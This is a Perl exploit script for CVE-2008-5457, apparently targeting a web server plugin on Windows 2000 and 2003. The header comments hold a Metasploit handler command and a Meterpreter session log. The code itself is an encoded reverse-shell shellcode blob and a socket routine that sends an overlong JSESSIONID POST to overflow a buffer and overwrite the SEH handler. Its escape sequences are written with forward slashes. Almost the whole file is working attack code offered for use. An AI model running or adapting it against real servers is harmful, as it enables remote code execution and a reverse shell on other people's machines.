#!/usr/bin/perl # No point in keeping this private anymore! # # k`sOSe - 02/16/2009 - CVE-2008-5457 # Tested on w2k sp4 and w2k3 R2 sp2 (no NX) # # cohelet framework-3.2 # ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E # [*] Please wait while we load the module tree... # [*] Handler binding to LHOST 0.0.0.0 # [*] Started reverse handler # [*] Starting the payload handler... # [*] Transmitting intermediate stager for over-sized stage...(191 bytes) # [*] Sending stage (75776 bytes) # [*] Meterpreter session 1 opened (10.10.10.1:80 -> 10.10.10.4:2171) # # meterpreter > rev2self # meterpreter > execute -i -f cmd.exe # Process 3092 created. # Channel 1 created. # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # # c:/windows/system32/inetsrv> # LHOST=10.10.10.1 LPORT=80 # windows/reflectivemeterpreter/reverse_tcp # [*] x86/alpha_mixed succeeded, final size 619 my $shellcode = "/xd9/xec/xd9/x74/x24/xf4/x5b/x53/x59/x49/x49/x49/x49/x49" . "/x49/x49/x49/x49/x43/x43/x43/x43/x43/x43/x43/x37/x51/x5a" . "/x6a/x41/x58/x50/x30/x41/x30/x41/x6b/x41/x41/x51/x32/x41" . "/x42/x32/x42/x42/x30/x42/x42/x41/x42/x58/x50/x38/x41/x42" . "/x75/x4a/x49/x4b/x4c/x4b/x58/x46/x36/x45/x50/x45/x50/x43" . "/x30/x50/x53/x46/x35/x51/x46/x51/x47/x4c/x4b/x42/x4c/x47" . "/x54/x44/x58/x4c/x4b/x50/x45/x47/x4c/x4c/x4b/x51/x44/x43" . "/x35/x44/x38/x45/x51/x4b/x5a/x4c/x4b/x50/x4a/x45/x48/x4c" . "/x4b/x51/x4a/x47/x50/x43/x31/x4a/x4b/x4b/x53/x50/x32/x51" . "/x59/x4c/x4b/x47/x44/x4c/x4b/x45/x51/x4a/x4e/x50/x31/x4b" . "/x4f/x4b/x4c/x50/x31/x49/x50/x4e/x4c/x47/x48/x4d/x30/x43" . "/x44/x44/x47/x49/x51/x48/x4f/x44/x4d/x43/x31/x49/x57/x4a" . "/x4b/x4b/x42/x47/x4b/x43/x4c/x47/x54/x42/x34/x44/x35/x4b" . "/x51/x4c/x4b/x51/x4a/x47/x54/x45/x51/x4a/x4b/x43/x56/x4c" . "/x4b/x44/x4c/x50/x4b/x4c/x4b/x51/x4a/x45/x4c/x45/x51/x4a" . "/x4b/x4c/x4b/x43/x34/x4c/x4b/x45/x51/x4a/x48/x4a/x4b/x43" . "/x32/x50/x31/x49/x50/x51/x4f/x51/x4e/x51/x4d/x51/x4b/x48" . "/x42/x45/x58/x43/x30/x51/x4e/x42/x4a/x46/x50/x51/x49/x43" . "/x54/x4c/x4b/x42/x39/x4c/x4b/x51/x4b/x44/x4c/x4c/x4b/x51" . "/x4b/x45/x4c/x4c/x4b/x45/x4b/x4c/x4b/x51/x4b/x44/x48/x51" . "/x43/x45/x38/x4c/x4e/x50/x4e/x44/x4e/x4a/x4c/x4b/x4f/x4e" . "/x36/x4d/x59/x48/x47/x46/x33/x45/x38/x46/x34/x48/x4a/x4e" . "/x4f/x4c/x51/x4b/x4f/x49/x46/x4d/x51/x4a/x4c/x45/x50/x43" . "/x31/x43/x30/x45/x50/x50/x50/x46/x37/x46/x36/x51/x43/x4d" . "/x59/x4d/x35/x4d/x38/x45/x4f/x43/x30/x45/x50/x43/x30/x4a" . "/x30/x43/x31/x43/x30/x45/x50/x48/x36/x45/x49/x42/x38/x4d" . "/x37/x49/x34/x42/x39/x42/x50/x4d/x39/x4a/x4c/x4c/x39/x4e" . "/x4a/x43/x50/x48/x59/x45/x59/x4a/x55/x4e/x4d/x48/x4b/x4a" . "/x4d/x4b/x4c/x47/x4b/x51/x47/x50/x53/x46/x52/x51/x4f/x46" . "/x53/x46/x52/x45/x50/x51/x4b/x4c/x4d/x50/x4b/x42/x38/x46" . "/x31/x4b/x4f/x48/x57/x4b/x39/x49/x4f/x4b/x39/x48/x43/x4c" . "/x4d/x44/x35/x44/x54/x43/x5a/x45/x55/x50/x59/x46/x31/x46" . "/x33/x4b/x4f/x46/x54/x4c/x4f/x4b/x4f/x50/x55/x44/x44/x51" . "/x49/x4c/x49/x44/x44/x4c/x4e/x4b/x52/x4b/x42/x46/x4b/x47" . "/x57/x50/x54/x4b/x4f/x50/x37/x4b/x4f/x46/x35/x51/x38/x46" . "/x51/x49/x50/x50/x50/x46/x30/x46/x30/x46/x30/x47/x30/x46" . "/x30/x47/x30/x50/x50/x4b/x4f/x51/x45/x51/x34/x4b/x39/x48" . "/x47/x45/x38/x44/x4a/x45/x5a/x44/x4a/x45/x51/x43/x58/x44" . "/x42/x45/x50/x45/x50/x46/x30/x4b/x39/x4d/x31/x43/x5a/x42" . "/x30/x46/x31/x51/x47/x4b/x4f/x50/x55/x51/x30/x43/x5a/x51" . "/x50/x51/x4e/x46/x36/x49/x51/x4a/x46/x45/x56/x51/x46/x49" . "/x51/x4a/x46/x44/x48/x46/x36/x43/x5a/x45/x50/x4b/x4f/x46" . "/x35/x44/x4c/x4d/x59/x49/x53/x42/x4a/x43/x30/x50/x56/x51" . "/x43/x50/x57/x4b/x4f/x46/x35/x44/x58/x4b/x4f/x48/x53/x44" . "/x4a/x41/x41"; use warnings; use strict; use IO::Socket::INET; my $sock = IO::Socket::INET->new(PeerAddr => '10.10.10.4', PeerPort => '80', Proto => 'tcp'); print $sock "POST /index.jsp?;JSESSIONID=" . "B" x 5132 . $shellcode . "C" x (3000-length($shellcode)) . "/xe9/x43/xf4/xff/xff" . # jmp back "/x90/x90/xeb/xf7" . # jmp back "/x76/x79" . # SEH partial rewrite " HTTP/1.0/r/n" . "Connection:Keep-Alive/r/n" . "Content-Length: 81/r/n/r/n" . "A" x 81 . "/r/n";